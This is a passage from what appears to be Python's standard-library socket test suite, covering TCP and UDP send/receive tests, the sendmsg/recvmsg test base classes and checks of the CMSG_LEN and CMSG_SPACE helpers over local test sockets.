socket.SO_VM_SOCKETS_BUFFER_SIZE))
self.assertEqual(orig_min * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE))
class BasicTCPTest(SocketConnectedTest):
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecv(self):
# Testing large receive over TCP
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.serv_conn.send(MSG)
def testOverFlowRecv(self):
# Testing receive in chunks over TCP
seg1 = self.cli_conn.recv(len(MSG) - 3)
seg2 = self.cli_conn.recv(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecv(self):
self.serv_conn.send(MSG)
def testRecvFrom(self):
# Testing large recvfrom() over TCP
msg, addr = self.cli_conn.recvfrom(1024)
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.serv_conn.send(MSG)
def testOverFlowRecvFrom(self):
# Testing recvfrom() in chunks over TCP
seg1, addr = self.cli_conn.recvfrom(len(MSG)-3)
seg2, addr = self.cli_conn.recvfrom(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecvFrom(self):
self.serv_conn.send(MSG)
def testSendAll(self):
# Testing sendall() with a 2048 byte string over TCP
msg = b''
while 1:
read = self.cli_conn.recv(1024)
if not read:
break
msg += read
self.assertEqual(msg, b'f' * 2048)
def _testSendAll(self):
big_chunk = b'f' * 2048
self.serv_conn.sendall(big_chunk)
def testFromFd(self):
# Testing fromfd()
fd = self.cli_conn.fileno()
sock = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
self.assertIsInstance(sock, socket.socket)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testFromFd(self):
self.serv_conn.send(MSG)
def testDup(self):
# Testing dup()
sock = self.cli_conn.dup()
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDup(self):
self.serv_conn.send(MSG)
def testShutdown(self):
# Testing shutdown()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
# wait for _testShutdown to finish: on OS X, when the server
# closes the connection the client also becomes disconnected,
# and the client's shutdown call will fail. (Issue #4397.)
self.done.wait()
def _testShutdown(self):
self.serv_conn.send(MSG)
self.serv_conn.shutdown(2)
testShutdown_overflow = support.cpython_only(testShutdown)
@support.cpython_only
def _testShutdown_overflow(self):
import _testcapi
self.serv_conn.send(MSG)
# Issue 15989
self.assertRaises(OverflowError, self.serv_conn.shutdown,
_testcapi.INT_MAX + 1)
self.assertRaises(OverflowError, self.serv_conn.shutdown,
2 + (_testcapi.UINT_MAX + 1))
self.serv_conn.shutdown(2)
def testDetach(self):
# Testing detach()
fileno = self.cli_conn.fileno()
f = self.cli_conn.detach()
self.assertEqual(f, fileno)
# cli_conn cannot be used anymore...
self.assertTrue(self.cli_conn._closed)
self.assertRaises(OSError, self.cli_conn.recv, 1024)
self.cli_conn.close()
# ...but we can create another socket using the (still open)
# file descriptor
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=f)
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDetach(self):
self.serv_conn.send(MSG)
class BasicUDPTest(ThreadedUDPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPSocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
        # Testing sendto() and recv() over UDP
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDP
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
# Tests for the sendmsg()/recvmsg() interface. Where possible, the
# same test code is used with different families and types of socket
# (e.g. stream, datagram), and tests using recvmsg() are repeated
# using recvmsg_into().
#
# The generic test classes such as SendmsgTests and
# RecvmsgGenericTests inherit from SendrecvmsgBase and expect to be
# supplied with sockets cli_sock and serv_sock representing the
# client's and the server's end of the connection respectively, and
# attributes cli_addr and serv_addr holding their (numeric where
# appropriate) addresses.
#
# The final concrete test classes combine these with subclasses of
# SocketTestBase which set up client and server sockets of a specific
# type, and with subclasses of SendrecvmsgBase such as
# SendrecvmsgDgramBase and SendrecvmsgConnectedBase which map these
# sockets to cli_sock and serv_sock and override the methods and
# attributes of SendrecvmsgBase to fill in destination addresses if
# needed when sending, check for specific flags in msg_flags, etc.
#
# RecvmsgIntoMixin provides a version of doRecvmsg() implemented using
# recvmsg_into().
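# As a rough sketch (illustrative only), a concrete class can then be as
# small as:
#
#   class SendmsgUDPTest(SendmsgConnectionlessTests, SendrecvmsgUDPTestBase):
#       pass
#
# with all of the actual test logic inherited from the generic classes.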
# XXX: like the other datagram (UDP) tests in this module, the code
# here assumes that datagram delivery on the local machine will be
# reliable.
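# For example, the concrete class RecvmsgUDPTest defined further below is
# simply
#
#     class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
#         pass
#
# where SendrecvmsgUDPTestBase combines SendrecvmsgDgramFlagsBase,
# SendrecvmsgConnectionlessBase, ThreadedSocketTestMixin and UDPTestBase.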
class SendrecvmsgBase(ThreadSafeCleanupTestCase):
# Base class for sendmsg()/recvmsg() tests.
# Time in seconds to wait before considering a test failed, or
# None for no timeout. Not all tests actually set a timeout.
fail_timeout = 3.0
def setUp(self):
self.misc_event = threading.Event()
super().setUp()
def sendToServer(self, msg):
# Send msg to the server.
return self.cli_sock.send(msg)
# Tuple of alternative default arguments for sendmsg() when called
# via sendmsgToServer() (e.g. to include a destination address).
sendmsg_to_server_defaults = ()
def sendmsgToServer(self, *args):
# Call sendmsg() on self.cli_sock with the given arguments,
# filling in any arguments which are not supplied with the
# corresponding items of self.sendmsg_to_server_defaults, if
# any.
return self.cli_sock.sendmsg(
*(args + self.sendmsg_to_server_defaults[len(args):]))
def doRecvmsg(self, sock, bufsize, *args):
# Call recvmsg() on sock with given arguments and return its
# result. Should be used for tests which can use either
# recvmsg() or recvmsg_into() - RecvmsgIntoMixin overrides
# this method with one which emulates it using recvmsg_into(),
# thus allowing the same test to be used for both methods.
result = sock.recvmsg(bufsize, *args)
self.registerRecvmsgResult(result)
return result
def registerRecvmsgResult(self, result):
# Called by doRecvmsg() with the return value of recvmsg() or
# recvmsg_into(). Can be overridden to arrange cleanup based
# on the returned ancillary data, for instance.
pass
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer.
self.assertEqual(addr1, addr2)
# Flags that are normally unset in msg_flags
msg_flags_common_unset = 0
for name in ("MSG_CTRUNC", "MSG_OOB"):
msg_flags_common_unset |= getattr(socket, name, 0)
# Flags that are normally set
msg_flags_common_set = 0
# Flags set when a complete record has been received (e.g. MSG_EOR
# for SCTP)
msg_flags_eor_indicator = 0
# Flags set when a complete record has not been received
# (e.g. MSG_TRUNC for datagram sockets)
msg_flags_non_eor_indicator = 0
def checkFlags(self, flags, eor=None, checkset=0, checkunset=0, ignore=0):
# Method to check the value of msg_flags returned by recvmsg[_into]().
#
# Checks that all bits in msg_flags_common_set attribute are
# set in "flags" and all bits in msg_flags_common_unset are
# unset.
#
# The "eor" argument specifies whether the flags should
# indicate that a full record (or datagram) has been received.
# If "eor" is None, no checks are done; otherwise, checks
# that:
#
# * if "eor" is true, all bits in msg_flags_eor_indicator are
# set and all bits in msg_flags_non_eor_indicator are unset
#
# * if "eor" is false, all bits in msg_flags_non_eor_indicator
# are set and all bits in msg_flags_eor_indicator are unset
#
# If "checkset" and/or "checkunset" are supplied, they require
# the given bits to be set or unset respectively, overriding
# what the attributes require for those bits.
#
# If any bits are set in "ignore", they will not be checked,
# regardless of the other inputs.
#
# Will raise Exception if the inputs require a bit to be both
# set and unset, and it is not ignored.
defaultset = self.msg_flags_common_set
defaultunset = self.msg_flags_common_unset
if eor:
defaultset |= self.msg_flags_eor_indicator
defaultunset |= self.msg_flags_non_eor_indicator
elif eor is not None:
defaultset |= self.msg_flags_non_eor_indicator
defaultunset |= self.msg_flags_eor_indicator
# Function arguments override defaults
defaultset &= ~checkunset
defaultunset &= ~checkset
# Merge arguments with remaining defaults, and check for conflicts
checkset |= defaultset
checkunset |= defaultunset
inboth = checkset & checkunset & ~ignore
if inboth:
raise Exception("contradictory set, unset requirements for flags "
"{0:#x}".format(inboth))
# Compare with given msg_flags value
mask = (checkset | checkunset) & ~ignore
self.assertEqual(flags & mask, checkset & mask)
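# Worked example for checkFlags() above (illustrative only): in an SCTP
# subclass where msg_flags_eor_indicator is MSG_EOR and
# msg_flags_common_unset includes MSG_CTRUNC, checkFlags(flags, eor=True)
# asserts that MSG_EOR is set and MSG_CTRUNC is unset in "flags";
# checkFlags(flags, eor=True, checkunset=MSG_EOR) overrides the default and
# asserts MSG_EOR is unset; and checkFlags(flags, eor=True,
# ignore=MSG_CTRUNC) leaves MSG_CTRUNC out of the comparison entirely.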
class RecvmsgIntoMixin(SendrecvmsgBase):
# Mixin to implement doRecvmsg() using recvmsg_into().
def doRecvmsg(self, sock, bufsize, *args):
buf = bytearray(bufsize)
result = sock.recvmsg_into([buf], *args)
self.registerRecvmsgResult(result)
self.assertGreaterEqual(result[0], 0)
self.assertLessEqual(result[0], bufsize)
return (bytes(buf[:result[0]]),) + result[1:]
class SendrecvmsgDgramFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for datagram sockets.
@property
def msg_flags_non_eor_indicator(self):
return super().msg_flags_non_eor_indicator | socket.MSG_TRUNC
class SendrecvmsgSCTPFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for SCTP sockets.
@property
def msg_flags_eor_indicator(self):
return super().msg_flags_eor_indicator | socket.MSG_EOR
class SendrecvmsgConnectionlessBase(SendrecvmsgBase):
# Base class for tests on connectionless-mode sockets. Users must
# supply sockets on attributes cli and serv to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.serv
@property
def cli_sock(self):
return self.cli
@property
def sendmsg_to_server_defaults(self):
return ([], [], 0, self.serv_addr)
def sendToServer(self, msg):
return self.cli_sock.sendto(msg, self.serv_addr)
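# With the defaults above, sendmsgToServer([MSG]) (defined in
# SendrecvmsgBase) expands to cli_sock.sendmsg([MSG], [], 0, serv_addr),
# supplying the destination address that an unconnected socket requires.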
class SendrecvmsgConnectedBase(SendrecvmsgBase):
# Base class for tests on connected sockets. Users must supply
# sockets on attributes serv_conn and cli_conn (representing the
# connections *to* the server and the client), to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.cli_conn
@property
def cli_sock(self):
return self.serv_conn
def checkRecvmsgAddress(self, addr1, addr2):
# Address is currently "unspecified" for a connected socket,
# so we don't examine it
pass
class SendrecvmsgServerTimeoutBase(SendrecvmsgBase):
# Base class to set a timeout on server's socket.
def setUp(self):
super().setUp()
self.serv_sock.settimeout(self.fail_timeout)
class SendmsgTests(SendrecvmsgServerTimeoutBase):
# Tests for sendmsg() which can use any socket type and do not
# involve recvmsg() or recvmsg_into().
def testSendmsg(self):
# Send a simple message with sendmsg().
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG]), len(MSG))
def testSendmsgDataGenerator(self):
# Send from buffer obtained from a generator (not a sequence).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgDataGenerator(self):
self.assertEqual(self.sendmsgToServer((o for o in [MSG])),
len(MSG))
def testSendmsgAncillaryGenerator(self):
# Gather (empty) ancillary data from a generator.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgAncillaryGenerator(self):
self.assertEqual(self.sendmsgToServer([MSG], (o for o in [])),
len(MSG))
def testSendmsgArray(self):
# Send data from an array instead of the usual bytes object.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgArray(self):
self.assertEqual(self.sendmsgToServer([array.array("B", MSG)]),
len(MSG))
def testSendmsgGather(self):
# Send message data from more than one buffer (gather write).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgGather(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
def testSendmsgBadArgs(self):
# Check that sendmsg() rejects invalid arguments.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadArgs(self):
self.assertRaises(TypeError, self.cli_sock.sendmsg)
self.assertRaises(TypeError, self.sendmsgToServer,
b"not in an iterable")
self.assertRaises(TypeError, self.sendmsgToServer,
object())
self.assertRaises(TypeError, self.sendmsgToServer,
[object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG, object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], 0, object())
self.sendToServer(b"done")
def testSendmsgBadCmsg(self):
# Check that invalid ancillary data items are rejected.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(object(), 0, b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, object(), b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, object())])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0)])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b"data", 42)])
self.sendToServer(b"done")
@requireAttrs(socket, "CMSG_SPACE")
def testSendmsgBadMultiCmsg(self):
# Check that invalid ancillary data items are rejected when
# more than one item is present.
self.assertEqual(self.serv_sock.recv(1000), b"done")
@testSendmsgBadMultiCmsg.client_skip
def _testSendmsgBadMultiCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [0, 0, b""])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b""), object()])
self.sendToServer(b"done")
def testSendmsgExcessCmsgReject(self):
# Check that sendmsg() rejects excess ancillary data items
# when the number that can be sent is limited.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgExcessCmsgReject(self):
if not hasattr(socket, "CMSG_SPACE"):
# Can only send one item
with self.assertRaises(OSError) as cm:
self.sendmsgToServer([MSG], [(0, 0, b""), (0, 0, b"")])
self.assertIsNone(cm.exception.errno)
self.sendToServer(b"done")
def testSendmsgAfterClose(self):
# Check that sendmsg() fails on a closed socket.
pass
def _testSendmsgAfterClose(self):
self.cli_sock.close()
self.assertRaises(OSError, self.sendmsgToServer, [MSG])
class SendmsgStreamTests(SendmsgTests):
# Tests for sendmsg() which require a stream socket and do not
# involve recvmsg() or recvmsg_into().
def testSendmsgExplicitNoneAddr(self):
# Check that peer address can be specified as None.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgExplicitNoneAddr(self):
self.assertEqual(self.sendmsgToServer([MSG], [], 0, None), len(MSG))
def testSendmsgTimeout(self):
# Check that timeout works with sendmsg().
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
def _testSendmsgTimeout(self):
try:
self.cli_sock.settimeout(0.03)
try:
while True:
self.sendmsgToServer([b"a"*512])
except socket.timeout:
pass
except OSError as exc:
if exc.errno != errno.ENOMEM:
raise
# bpo-33937: the test randomly fails on Travis CI with
# "OSError: [Errno 12] Cannot allocate memory"
else:
self.fail("socket.timeout not raised")
finally:
self.misc_event.set()
# XXX: would be nice to have more tests for sendmsg flags argument.
# Linux supports MSG_DONTWAIT when sending, but in general, it
# only works when receiving. Could add other platforms if they
# support it too.
@skipWithClientIf(sys.platform not in {"linux"},
"MSG_DONTWAIT not known to work on this platform when "
"sending")
def testSendmsgDontWait(self):
# Check that MSG_DONTWAIT in flags causes non-blocking behaviour.
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@testSendmsgDontWait.client_skip
def _testSendmsgDontWait(self):
try:
with self.assertRaises(OSError) as cm:
while True:
self.sendmsgToServer([b"a"*512], [], socket.MSG_DONTWAIT)
# bpo-33937: catch also ENOMEM, the test randomly fails on Travis CI
# with "OSError: [Errno 12] Cannot allocate memory"
self.assertIn(cm.exception.errno,
(errno.EAGAIN, errno.EWOULDBLOCK, errno.ENOMEM))
finally:
self.misc_event.set()
class SendmsgConnectionlessTests(SendmsgTests):
# Tests for sendmsg() which require a connectionless-mode
# (e.g. datagram) socket, and do not involve recvmsg() or
# recvmsg_into().
def testSendmsgNoDestAddr(self):
# Check that sendmsg() fails when no destination address is
# given for unconnected socket.
pass
def _testSendmsgNoDestAddr(self):
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG])
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG], [], 0, None)
class RecvmsgGenericTests(SendrecvmsgBase):
# Tests for recvmsg() which can also be emulated using
# recvmsg_into(), and can use any socket type.
def testRecvmsg(self):
# Receive a simple message with recvmsg[_into]().
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsg(self):
self.sendToServer(MSG)
def testRecvmsgExplicitDefaults(self):
# Test recvmsg[_into]() with default arguments provided explicitly.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgExplicitDefaults(self):
self.sendToServer(MSG)
def testRecvmsgShorter(self):
# Receive a message smaller than buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) + 42)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShorter(self):
self.sendToServer(MSG)
def testRecvmsgTrunc(self):
# Receive part of message, check for truncation indicators.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
def _testRecvmsgTrunc(self):
self.sendToServer(MSG)
def testRecvmsgShortAncillaryBuf(self):
# Test ancillary data buffer too small to hold any ancillary data.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShortAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgLongAncillaryBuf(self):
# Test large ancillary data buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgLongAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgAfterClose(self):
# Check that recvmsg[_into]() fails on a closed socket.
self.serv_sock.close()
self.assertRaises(OSError, self.doRecvmsg, self.serv_sock, 1024)
def _testRecvmsgAfterClose(self):
pass
def testRecvmsgTimeout(self):
# Check that timeout works.
try:
self.serv_sock.settimeout(0.03)
self.assertRaises(socket.timeout,
self.doRecvmsg, self.serv_sock, len(MSG))
finally:
self.misc_event.set()
def _testRecvmsgTimeout(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@requireAttrs(socket, "MSG_PEEK")
def testRecvmsgPeek(self):
# Check that MSG_PEEK in flags enables examination of pending
# data without consuming it.
# Receive part of data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3, 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
# Ignoring MSG_TRUNC here (so this test is the same for stream
# and datagram sockets). Some wording in POSIX seems to
# suggest that it needn't be set when peeking, but that may
# just be a slip.
self.checkFlags(flags, eor=False,
ignore=getattr(socket, "MSG_TRUNC", 0))
# Receive all data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
# Check that the same data can still be received normally.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgPeek.client_skip
def _testRecvmsgPeek(self):
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
def testRecvmsgFromSendmsg(self):
# Test receiving with recvmsg[_into]() when message is sent
# using sendmsg().
self.serv_sock.settimeout(self.fail_timeout)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgFromSendmsg.client_skip
def _testRecvmsgFromSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
class RecvmsgGenericStreamTests(RecvmsgGenericTests):
# Tests which require a stream socket and can use either recvmsg()
# or recvmsg_into().
def testRecvmsgEOF(self):
# Receive end-of-stream indicator (b"", peer socket closed).
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.assertEqual(msg, b"")
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=None) # Might not have end-of-record marker
def _testRecvmsgEOF(self):
self.cli_sock.close()
def testRecvmsgOverflow(self):
# Receive a message in more than one chunk.
seg1, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
seg2, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testRecvmsgOverflow(self):
self.sendToServer(MSG)
class RecvmsgTests(RecvmsgGenericTests):
# Tests for recvmsg() which can use any socket type.
def testRecvmsgBadArgs(self):
# Check that recvmsg() rejects invalid arguments.
self.assertRaises(TypeError, self.serv_sock.recvmsg)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
-1, 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
len(MSG), -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
[bytearray(10)], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
object(), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), 0, object())
msg, ancdata, flags, addr = self.serv_sock.recvmsg(len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgBadArgs(self):
self.sendToServer(MSG)
class RecvmsgIntoTests(RecvmsgIntoMixin, RecvmsgGenericTests):
# Tests for recvmsg_into() which can use any socket type.
def testRecvmsgIntoBadArgs(self):
# Check that recvmsg_into() rejects invalid arguments.
buf = bytearray(len(MSG))
self.assertRaises(TypeError, self.serv_sock.recvmsg_into)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
len(MSG), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
buf, 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[object()], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[b"I'm not writable"], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf, object()], 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg_into,
[buf], -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], 0, object())
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf], 0, 0)
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoBadArgs(self):
self.sendToServer(MSG)
def testRecvmsgIntoGenerator(self):
# Receive into buffer obtained from a generator (not a sequence).
buf = bytearray(len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
(o for o in [buf]))
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoGenerator(self):
self.sendToServer(MSG)
def testRecvmsgIntoArray(self):
# Receive into an array rather than the usual bytearray.
buf = array.array("B", [0] * len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf])
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf.tobytes(), MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoArray(self):
self.sendToServer(MSG)
def testRecvmsgIntoScatter(self):
# Receive into multiple buffers (scatter write).
b1 = bytearray(b"----")
b2 = bytearray(b"0123456789")
b3 = bytearray(b"--------------")
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
[b1, memoryview(b2)[2:9], b3])
self.assertEqual(nbytes, len(b"Mary had a little lamb"))
self.assertEqual(b1, bytearray(b"Mary"))
self.assertEqual(b2, bytearray(b"01 had a 9"))
self.assertEqual(b3, bytearray(b"little lamb---"))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoScatter(self):
self.sendToServer(b"Mary had a little lamb")
class CmsgMacroTests(unittest.TestCase):
# Test the functions CMSG_LEN() and CMSG_SPACE(). Tests
# assumptions used by sendmsg() and recvmsg[_into](), which share
# code with these functions.
# Match the definition in socketmodule.c
try:
import _testcapi
except ImportError:
socklen_t_limit = 0x7fffffff
else:
socklen_t_limit = min(0x7fffffff, _testcapi.INT_MAX)
@requireAttrs(socket, "CMSG_LEN")
def testCMSG_LEN(self):
# Test CMSG_LEN() with various valid and invalid values,
# checking the assumptions used by recvmsg() and sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_LEN(0) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(socket.CMSG_LEN(0), array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_LEN(n)
# This is how recvmsg() calculates the data size
self.assertEqual(ret - socket.CMSG_LEN(0), n)
self.assertLessEqual(ret, self.socklen_t_limit)
self.assertRaises(OverflowError, socket.CMSG_LEN, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_LEN, toobig)
self.assertRaises(OverflowError, socket.CMSG_LEN, sys.maxsize)
@requireAttrs(socket, "CMSG_SPACE")
def testCMSG_SPACE(self):
# Test CMSG_SPACE() with various valid and invalid values,
# checking the assumptions used by sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_SPACE(1) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
last = socket.CMSG_SPACE(0)
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(last, array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_SPACE(n)
self.assertGreaterEqual(ret, last)
self.assertGreaterEqual(ret, socket.CMSG_LEN(n))
self.assertGreaterEqual(ret, n + socket.CMSG_LEN(0))
self.assertLessEqual(ret, self.socklen_t_limit)
last = ret
self.assertRaises(OverflowError, socket.CMSG_SPACE, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_SPACE, toobig)
self.assertRaises(OverflowError, socket.CMSG_SPACE, sys.maxsize)
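# Note on sizing ancillary buffers (summarising the checks above): for a
# single data item of n bytes, CMSG_LEN(n) equals n + CMSG_LEN(0) (the
# cmsghdr plus data, as testCMSG_LEN checks), while CMSG_SPACE(n)
# additionally reserves room for trailing padding, so
# CMSG_SPACE(n) >= CMSG_LEN(n).  The receive buffers passed to
# recvmsg[_into]() below are therefore usually sized with CMSG_SPACE();
# RFC 3542 allows MSG_CTRUNC to be set when only CMSG_LEN() worth of space
# is supplied (see testFDPassCMSG_LEN below).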
class SCMRightsTest(SendrecvmsgServerTimeoutBase):
# Tests for file descriptor passing on Unix-domain sockets.
